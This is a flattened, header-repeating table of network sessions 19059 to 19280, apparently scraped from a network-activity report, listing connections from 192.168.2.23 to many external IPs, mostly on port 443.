                                                19059192.168.2.2352626181.222.163.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19060192.168.2.2339940175.180.36.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19061192.168.2.234143690.221.18.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19062192.168.2.2359138176.207.215.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19063192.168.2.2354150175.203.244.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19064192.168.2.2359520128.117.107.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19065192.168.2.2352952197.208.42.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19066192.168.2.2349388160.154.75.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19067192.168.2.2348108126.175.239.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19068192.168.2.2338232174.240.84.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19069192.168.2.2359878206.95.173.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19070192.168.2.2346370117.92.181.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19071192.168.2.2333268223.20.98.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19072192.168.2.2342110157.141.2.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19073192.168.2.2351452138.51.21.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19074192.168.2.235710286.127.167.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19075192.168.2.2342148182.34.165.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19076192.168.2.233412613.170.22.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19077192.168.2.235874634.82.155.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19078192.168.2.2340456210.181.171.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19079192.168.2.2346122121.74.37.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19080192.168.2.235047257.61.229.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19081192.168.2.234105659.199.82.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19082192.168.2.233872473.250.153.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19083192.168.2.2337770195.84.11.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19084192.168.2.234171451.126.93.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19085192.168.2.2360138202.103.148.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19086192.168.2.2338354175.101.210.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19087192.168.2.233810838.134.189.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19088192.168.2.2355878106.146.0.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19089192.168.2.234805248.79.198.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19090192.168.2.234753639.115.220.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19091192.168.2.2343846209.244.197.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19092192.168.2.2360992141.224.83.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19093192.168.2.2335382184.122.61.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19094192.168.2.235755412.188.6.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19095192.168.2.2356186134.144.197.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19096192.168.2.235197259.105.78.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19097192.168.2.236070870.153.12.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19098192.168.2.2349738118.254.198.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19099192.168.2.2357082120.226.155.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19100192.168.2.2360382188.66.24.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19101192.168.2.23441302.146.86.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19102192.168.2.2336828136.0.144.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19103192.168.2.2333528175.22.45.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19104192.168.2.2335278180.223.24.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19105192.168.2.2337670154.44.209.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19106192.168.2.235668888.124.246.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19107192.168.2.234815835.26.192.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19108192.168.2.2359156156.137.35.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19109192.168.2.2333416176.210.75.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19110192.168.2.2359178195.247.136.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19111192.168.2.234404458.167.232.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19112192.168.2.234769097.158.204.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19113192.168.2.234308881.66.234.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19114192.168.2.2344934177.212.59.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19115192.168.2.235736274.229.186.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19116192.168.2.2337360211.255.255.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19117192.168.2.2358292128.67.23.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19118192.168.2.2340034141.224.53.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19119192.168.2.233499094.155.176.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19120192.168.2.2332958114.214.33.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19121192.168.2.2352934142.87.212.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19122192.168.2.2345178176.51.73.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19123192.168.2.2345860196.132.27.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19124192.168.2.2351524213.191.27.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19125192.168.2.235644876.245.181.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19126192.168.2.2350726196.200.128.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19127192.168.2.233422657.218.31.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19128192.168.2.2334358131.71.93.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19129192.168.2.234479481.121.84.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19130192.168.2.2354670204.93.6.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19131192.168.2.233944417.185.97.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19132192.168.2.2351652137.208.129.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19133192.168.2.235850683.160.62.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19134192.168.2.233909697.111.104.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19135192.168.2.2346938187.98.253.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19136192.168.2.2359936142.103.91.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19137192.168.2.2352064156.229.143.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19138192.168.2.2333696174.200.36.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19139192.168.2.2350754122.144.230.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19140192.168.2.23445165.104.247.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19141192.168.2.234185080.144.153.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19142192.168.2.235427490.29.86.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19143192.168.2.2340678186.41.158.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19144192.168.2.233308831.1.185.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19145192.168.2.233953020.244.154.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19146192.168.2.2348574201.185.156.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19147192.168.2.234199859.58.200.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19148192.168.2.235406612.237.205.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19149192.168.2.2336636117.46.65.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19150192.168.2.2347726199.220.112.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19151192.168.2.2348938209.117.101.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19152192.168.2.234693052.74.137.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19153192.168.2.23388569.48.192.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19154192.168.2.233737835.12.80.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19155192.168.2.236023088.165.82.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19156192.168.2.2358164126.236.52.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19157192.168.2.235343489.115.106.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19158192.168.2.234350889.205.111.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19159192.168.2.235723041.197.25.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19160192.168.2.2349470144.94.211.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19161192.168.2.23465289.208.26.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19162192.168.2.233671053.235.104.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19163192.168.2.2344866111.91.39.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19164192.168.2.2342226218.133.24.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19165192.168.2.2341428149.172.63.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19166192.168.2.23421929.145.143.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19167192.168.2.235108070.100.56.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19168192.168.2.2346002123.17.40.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19169192.168.2.2359154202.143.115.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19170192.168.2.2344786203.60.41.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19171192.168.2.2358650196.15.133.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19172192.168.2.2349958147.198.1.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19173192.168.2.2336188131.24.24.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19174192.168.2.2359344181.201.95.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19175192.168.2.2340084122.236.165.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19176192.168.2.2357028116.172.159.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19177192.168.2.235127427.154.219.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19178192.168.2.2335744203.183.202.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19179192.168.2.235336672.216.18.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19180192.168.2.236071461.66.35.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19181192.168.2.2340464220.128.17.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19182192.168.2.2345440110.69.44.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19183192.168.2.234447671.36.156.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19184192.168.2.235904431.111.80.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19185192.168.2.235606892.132.219.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19186192.168.2.2346630119.158.190.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19187192.168.2.234267038.65.2.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19188192.168.2.2332956208.24.30.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19189192.168.2.2342044102.30.183.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19190192.168.2.235088899.87.55.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19191192.168.2.234933489.17.88.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192192.168.2.2350382190.33.255.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19193192.168.2.234899851.88.192.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19194192.168.2.2344360143.18.43.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19195192.168.2.2357330106.5.86.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19196192.168.2.2342470100.56.26.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19197192.168.2.2355974194.152.3.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19198192.168.2.234192661.228.87.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19199192.168.2.23563485.238.88.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19200192.168.2.235309080.146.239.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19201192.168.2.235459289.205.170.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19202192.168.2.2343868188.75.132.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19203192.168.2.2339990206.220.238.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19204192.168.2.2343470148.229.221.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19205192.168.2.235906231.33.137.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19206192.168.2.2334934195.184.119.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19207192.168.2.234980270.232.101.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19208192.168.2.235542241.131.247.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19209192.168.2.2355952213.106.150.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19210192.168.2.2334102220.34.78.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19211192.168.2.234863849.165.165.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19212192.168.2.2345726163.44.251.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19213192.168.2.234578840.59.178.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19214192.168.2.235207099.107.254.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19215192.168.2.234454662.66.253.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19216192.168.2.234703089.195.27.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19217192.168.2.2342400189.84.50.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19218192.168.2.2360930195.230.92.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19219192.168.2.2334874140.99.184.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19220192.168.2.235385479.138.16.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19221192.168.2.2342956180.179.30.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19222192.168.2.2342518159.120.139.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19223192.168.2.2359442196.240.40.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19224192.168.2.2343238163.15.190.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19225192.168.2.234474275.216.50.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19226192.168.2.2349498208.253.230.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19227192.168.2.233831096.16.92.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19228192.168.2.2341156160.157.24.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19229192.168.2.2341266218.85.148.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19230192.168.2.2358244123.132.160.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19231192.168.2.235817651.66.188.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19232192.168.2.234558274.127.82.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19233192.168.2.2350254129.56.124.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19234192.168.2.2342598162.131.125.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19235192.168.2.2343112196.88.5.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19236192.168.2.233532827.244.182.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19237192.168.2.2341410148.88.163.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19238192.168.2.235907223.81.66.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19239192.168.2.2347238142.130.223.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19240192.168.2.2335480131.206.111.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19241192.168.2.2350314138.65.140.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19242192.168.2.2341158112.93.207.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19243192.168.2.2351266219.36.126.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19244192.168.2.233967085.173.170.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19245192.168.2.2340324178.245.75.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19246192.168.2.235107071.196.21.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19247192.168.2.2338026107.198.73.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19248192.168.2.23565824.167.243.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19249192.168.2.234645879.10.94.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19250192.168.2.2338196129.22.91.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19251192.168.2.2341254218.28.64.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19252192.168.2.2342880176.183.220.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19253192.168.2.2341488177.50.240.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19254192.168.2.234238234.238.249.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19255192.168.2.234579864.141.177.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19256192.168.2.233589636.217.84.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19257192.168.2.2333762103.133.223.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19258192.168.2.2356712158.53.153.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19259192.168.2.2335478205.192.73.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19260192.168.2.2352308175.140.64.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19261192.168.2.2336254186.123.210.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19262192.168.2.233477672.59.43.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19263192.168.2.235034263.142.213.1688080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19264192.168.2.235107623.249.183.1068080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19265192.168.2.235530080.46.71.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19266192.168.2.2345004116.3.105.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19267192.168.2.2335756116.93.83.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19268192.168.2.2352220149.171.172.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19269192.168.2.2356648198.180.75.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19270192.168.2.2350298171.34.111.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19271192.168.2.234073672.59.11.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19272192.168.2.2334464183.136.135.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19273192.168.2.234128635.223.11.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19274192.168.2.2338026165.230.187.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19275192.168.2.2335110140.145.166.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19276192.168.2.23413162.24.216.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19277192.168.2.2347494189.6.197.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19278192.168.2.2343302153.194.98.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19279192.168.2.2343604149.95.76.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19280192.168.2.2354924162.43.104.42443
                                                TimestampBytes transferredDirectionData


